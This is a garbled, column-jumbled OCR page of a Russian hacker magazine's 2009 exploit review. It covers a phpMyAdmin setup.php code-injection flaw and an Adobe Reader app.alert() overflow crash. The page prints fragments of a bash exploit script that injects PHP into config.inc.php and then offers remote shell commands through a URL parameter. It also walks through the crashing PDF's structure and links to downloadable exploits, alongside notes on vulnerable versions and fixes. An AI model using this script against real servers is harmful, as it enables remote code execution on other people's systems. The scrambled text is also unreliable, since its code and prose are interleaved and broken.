Views
3 years ago

НЕСЛУЧАЙНО CUDA ИДЕМ? phpMyAdmin - Xakep Online

НЕСЛУЧАЙНО CUDA ИДЕМ? phpMyAdmin - Xakep Online

взлом обзор

взлом обзор эксплоитов обзор эксплоитов обзор эксплоитов ор плоитов ОШИБКА ТУПАЯ ДО БОЛИ ор плоитов ор плоитов СЕГОДНЯ НЕ НАШ ДЕНЬ. ПРИДЕТСЯ ПИСАТЬ АВТОСКАНЕР... flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html" echo "[+] attempting to inject phpinfo() ..." curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup. php" >/dev/null if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null then curl -ks --url "$3/config/config.inc.php" >$flag echo "[+] success! phpinfo() injected successfully! output saved on $flag" curl -ks -b $2 -d $postdata2 --url "$3/scripts/ setup.php» >/dev/null echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:" echo " $3/config/config.inc.php?c=ls+-l+/" echo " $3/config/config.inc.php?p=phpinfo();" echo " please send any feedback/improvements for this script to"\ "unknown.pentestergmail.com" else >> Brief Очередная темная лошадка на арене PoC появилась в начале июня. На этот раз, по заявлениям неизвестных багоискателей, обнаружилась брешь в Adobe Acrobat аж до версии 9.1.1. В паблик выложили лишь PoC-эксплойт, при запуске которого ничего не происходит. Точнее, происходит — вываливается среда, из которой был запущен PoC. Если это браузер — закрываются все вкладки IE/Firefox/Opera/Mozilla. Если это сам Acrobat Reader — то и он вылетает. Короче говоря, сплойт действительно сшибает с ног Adobe Reader. Почему же так происходит? Чтобы это выяснить, бережно скачаем PDF’ку каким-нибудь сторонним менеджером (я использовал wget на удаленном сервере) и присмотримся к исходному коду файла. Для простоты восприятия, помещаю его ниже. %PDF-1.4 % 4 0 objendobj 5 0 objstream endstream endobj 3 0 objendobj 2 0 objendobj НЕМЕДЛЕННОЕ ОБНОВЛЕНИЕ ор плоитов echo "[+] no luck injecting to $3/config/config.inc. php :(" exit fi } Если ты не поленишься написать простенький PHP-парсер передаваемых строк, то получишь посимвольную картину инжекта. Полный код эксплойта можно скачать по ссылке securitylab.ru/poc/ extra/381413.php. ор плоитов >> Targets: Уязвимыми версиями phpMyAdmin являются 2.11.x до 2.11.9.5 и 3.x до 3.1.3.1 (все релизы достаточно новые и выпускались до апреля этого года). ор плоитов >> Solution Нависшую угрозу безопасности решит либо удаление файла «/scripts/ setup.php», либо изолирование каталога «/config» вне Web-директории, либо (самый предпочтительный вариант) обновление phpMyAdmin до свежей версии. Последнее можно осуществить с официальной локации: sourceforge.net/projects/phpmyadmin. 03 ADOBE ACROBAT 9.1.1 STACK OVERFLOW CRASH POC EXPLOIT ор плоитов 050 XÀÊÅÐ 07 /127/ 09

обзор эксплоитов обзор эксплоитов обзор эксплоитов >> взлом обзор эксплоитов НА ВОЛОСКЕ ОТ СМЕРТИ... 6 0 objendobj 1 0 objendobj xref 0 7 0000000000 65535 f 0000020392 00000 n 0000000193 00000 n 0000000098 00000 n 0000000015 00000 n 0000000052 00000 n 0000000245 00000 n trailer > startxref 20452 %%EOF Смотрим и видим, что в секции init есть странный alert, содержащий 4098 байт мусора. Очевидно, что он и стал причиной падения. Как говорится, доверяй, но проверяй, поэтому я отредактировал файл, оставив лишь 10 байт «мусора». В итоге, PDF’ка открылась без ошибок. Каков же вывод? Все просто, функция «app.alert()» не содержит должную проверку на переполнение, в итоге, мы имеем безобидный DoS. Подчеркиваю, именно безобидный, поскольку в приватных кругах наверняка ходит эксплойт, реализующий выполнение произвольного системного кода, который впоследствии будет использоваться в различных связках для «пробива» приватных троянцев. Поэтому мотай информацию на ус и немедленно обновляйся. XÀÊÅÐ 07 /127/ 09 ТЕХНИЧЕСКОЕ ОПИСАНИЕ БАГА В LIBSNDFILE >> Exploit Вбей в адресную строку «securitylab.ru/_download/exploits/2009/05/ adobe-reader-dos.pdf» и увидишь... аварийное закрытие браузера :). >> Targets Уязвимыми являются все версии Acrobat Reader, включая релиз 9.1.1. Помни, что если ты жмякнешь на ссылку с ядовитым PDF-файлом, захлопнется и программа, которая инициировала его открытие. >> Solution Обновляй читалку на официальном сайте «get.adobe.com/reader». Тем самым ты защитишь свой компьютер от непрошеных гостей. 051

ИюНь - Xakep Online
Май - Xakep Online
ЛЕГКИЙ ХАК - Xakep Online
7 ЧУДЕС KDE - Xakep Online
Скачать - Xakep Online
УЧИМ КАКОценить сбалансированность системы ... - Xakep Online
Январь - Xakep Online
Офисное западло - Xakep Online
WebMoney - Xakep Online
Untitled - Xakep Online
JIT SPRAY АНАЛИЗ TDSS - Xakep Online
Скачать - Xakep Online
ЛУЧШИХ ВИРУСОВ - Xakep Online
Ноябрь - Xakep Online
КОНКУРС - Xakep Online
Много новогодних конкурсов Много новогодних ... - Xakep Online
Скачать - Xakep Online
Взлом GSM - Xakep Online
2009 - Xakep Online
ВЗЛОМ ИНТЕРНЕТ-МАГАЗИНА: - Xakep Online
с татьи - Xakep Online
c-лето ;) - Xakep Online
содержание 10 (59) - Xakep Online
Ноябрь - Xakep Online
Бунт машин и восстание червей - Xakep Online
ЗАКАДРИ КАРДИНГ НАШИ ИДУТ! - Xakep Online
шпион внутри - Xakep Online